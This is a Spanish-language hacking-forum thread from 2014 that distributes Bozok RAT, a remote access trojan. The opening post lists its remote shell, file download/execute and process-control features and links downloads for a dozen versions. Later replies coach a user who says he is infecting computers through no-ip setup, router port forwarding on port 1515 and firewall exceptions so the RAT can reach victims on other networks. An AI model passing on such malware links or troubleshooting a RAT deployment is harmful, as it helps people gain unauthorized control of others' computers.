Underc0de

[In]Seguridad Informática => Análisis y desarrollo de malwares => Mensaje iniciado por: Stuxnet en Junio 10, 2014, 10:46:18 AM

Título: Bozok Rat
Publicado por: Stuxnet en Junio 10, 2014, 10:46:18 AM
(http://3.bp.blogspot.com/-aGvorQ13M38/Ul1jGhws_MI/AAAAAAAAB74/RnJp2jAZiTU/s1600/bozok.png)

Algunas de sus características:

-Shell Remota
-Buscador de archivos
-Descargar carpeta
-Terminar/Borrar Procesos
-Multi-lenguaje
-Descargar/Ejecutar Archivos
-Administrador De Archivos
-Administrador De Procesos
-Administrador De Registros
-Entre otras.

Descargar Bozok Rat.

Bozok Rat 1.0  (https://mega.co.nz/#!Q5hhXIRA!FJFhL1HBsBgr0hrEI1YPtSfSRsct6lJ3Hmuq7lORbF0) 
Bozok Rat 1.1    (https://mega.co.nz/#!Vx4xRapa!UxZzQzj35MeFtmMTWGWfITX3jFUwssFqzVEn0iaBuPc)
Bozok Rat 1.1.1 (https://mega.co.nz/#!Zk5XDZzQ!Py8_mQrmeOTRH731Ow7ASmjM7MwGIt9n1ohWm2sjRq4)
Bozok Rat 1.2   (https://mega.co.nz/#!0gYR3SzB!OIJOrhNReTGhmDYA4l5-Mj1sDMYqosTujBa0fqN1GkA)
Bozok Rat 1.2.1    (https://mega.co.nz/#!Z1ozHDyD!Q9FMuULv_hwSwKwSOLxg5WgpJO4XK-PxZ2eu-i3hdMc)
Bozok Rat 1.3    (https://mega.co.nz/#!txo1SQRS!Oxa5e2EgmuTOigkaadSgBFm3bnhtq-YxmclJHxcuA4M)
Bozok Rat 1.3.1    (https://mega.co.nz/#!Fxh2VYxY!XfVoZAQt4nW1XBsmAnyRmiGtS-kVRqWB-qipJ1R2DsQ)
Bozok Rat 1.4    (https://mega.co.nz/#!slIA1agL!UDBd1y9lc_RwQhGaAUgSyypH5mpPFr4-O4KK_23YEpo)
Bozok Rat 1.4.1   (https://mega.co.nz/#!9gwxVCCb!LxtZ8QThJgg97kjcG7n0YgePYR9UwlERegW4zg6qM3k)
Bozok Rat 1.4.2 (https://mega.co.nz/#!FhwlkDqJ!MJTztABxCp1TYfwTQMDRzgaH22Urhup7bGAKV0bDZwA)
Bozok Rat 1.4.3 (https://mega.co.nz/#!c0pizYID!RdONqjI__sijkXlZ5GKf6R5INeNHXYGxgRxCPd866JY)
Bozok Rat 1.5 (https://mega.co.nz/#!x85BkA7a!D7Uebjy95SztWHIN5zSVkQRXwgcSVzMfisu3WIRNUqY)
Bozok Rat 1.5.1 (http://underc0de.org/foro/index.php?topic=21831.0)

Nota: Unicamente cambie el mirror los archivos estan sin modificar.
Título: Re:Bozok Rat
Publicado por: ANTRAX en Junio 10, 2014, 10:55:37 AM
Muy buena bro!
Gracias por la coleccion de versiones!
Veré si las descargo a todas y las pongo en la bd de malwares!

Saludos!
ANTRAX
Título: Re:Bozok Rat
Publicado por: cibi en Junio 15, 2014, 06:36:15 AM
Una pregunta este rat funciona muy bien pero he probado de usarlo conectado a otra red con el noip y no me sale la conexión, solo funciona infectando ordenadores en una misma red o también funciona en pcs que estén en otras redes?
Título: Re:Bozok Rat
Publicado por: blackdrake en Junio 15, 2014, 07:52:29 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una pregunta este rat funciona muy bien pero he probado de usarlo conectado a otra red con el noip y no me sale la conexión, solo funciona infectando ordenadores en una misma red o también funciona en pcs que estén en otras redes?

Pues..., no he probado este Rat, pero obviamente debe de funcionar fuera de tu propia red, seguramente, hayas configurado mal el servidor o la no-ip, puedes mirar a ver si la no-ip redirige a tu IP y, tienes los puertos abiertos.

Un saludo.
Título: Re:Bozok Rat
Publicado por: cibi en Junio 16, 2014, 10:47:19 AM
ok gracias pues he probado de abrir puertos en mi router vodafone pero no me funciona si me conecto a otra red...
En la red de un smartphone con el wifi de android activo y con otro pc conectado a esa red debería funcionar o no?
Si  no ya seguiré probando gracias.
Título: Re:Bozok Rat
Publicado por: blackdrake en Junio 16, 2014, 01:31:02 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ok gracias pues he probado de abrir puertos en mi router vodafone pero no me funciona si me conecto a otra red...
En la red de un smartphone con el wifi de android activo y con otro pc conectado a esa red debería funcionar o no?
Si  no ya seguiré probando gracias.

Puedes utilizar esta herramienta para saber si lo que falla es tu no-ip o los puertos.

http://underc0de.org/foro/index.php?topic=21582

Comenta los resultados y ya vemos cual puede ser el error.

Un saludo.
Título: Re:Bozok Rat
Publicado por: cibi en Junio 16, 2014, 04:33:53 PM
Gracias lo he probado y he desactivado el firewall y me dice que el puerto 1515 no esta bien abierto en el router:
Cuando configuro para abrir los puertos del router en nat me sale esto:

Aplicación    Protocolo   Primer Puerto Externo   Último Puerto Externo   IP de destino   Primer Puerto Interno   Último Puerto Interno

noip                                        1515                                    1515                  Mi IP privada                   1515                            1515

Aquí dejo una imagen:

http://subefotos.com/ver/?1d6be290867e3aa75ecb618a4f979e82o.jpg

Mi router es vodafone esta bien configurado o no? Porque tengo que poner 4 puertos, 2 internos y  2 externos.
Como lo puedo solucionar porque me dice que el puerto 1515 no esta bien abierto en el router...
Título: Re:Bozok Rat
Publicado por: blackdrake en Junio 17, 2014, 10:27:32 AM
Puedes decirnos el router que tienes en concreto? (el modelo)

En cuanto a la imagen, aparentemente está bien configurado (contando de que tu ip interna es la 192.168.0.194)

Por lo que, dime el modelo del router y quizás podamos averiguar que falla.

Un saludo.
Título: Re:Bozok Rat
Publicado por: cibi en Junio 17, 2014, 12:05:20 PM
El modelo del router es HG556a este: http://wiki.bandaancha.st/Huawei_HG556a_de_Vodafone
Título: Re:Bozok Rat
Publicado por: blackdrake en Junio 19, 2014, 06:00:14 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El modelo del router es HG556a este: http://wiki.bandaancha.st/Huawei_HG556a_de_Vodafone

Mira estos enlaces de como abrir los puertos en tu router:

https://sites.google.com/site/ircemulespanish/abrir-puertos/huawei/hg556a

http://www.informaticator.com/web/index.php/manuales/guias/25-routers/635-guia-huawei-hg556a

Un saludo.
Título: Re:Bozok Rat
Publicado por: zyack123 en Junio 19, 2014, 06:16:32 AM
Porfavor solucionad los enlaces :)
Título: Re:Bozok Rat
Publicado por: cibi en Junio 19, 2014, 12:13:35 PM
Por un momento lo había conseguido con el try connect me dijo conexión satisfactoria pero porque fui al panel de control y permitir un programa atraves del firewall de windows, y permitir el rat y el tryconnect y por un momento me había funcionado pero ahora a vuelto a dejar de funcionar...
Título: Re:Bozok Rat
Publicado por: blackdrake en Junio 19, 2014, 01:25:15 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Porfavor solucionad los enlaces :)

Enlaces solucionados

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por un momento lo había conseguido con el try connect me dijo conexión satisfactoria pero porque fui al panel de control y permitir un programa atraves del firewall de windows, y permitir el rat y el tryconnect y por un momento me había funcionado pero ahora a vuelto a dejar de funcionar...

Prueba con otro RAT y salimos de dudas

Un saludo.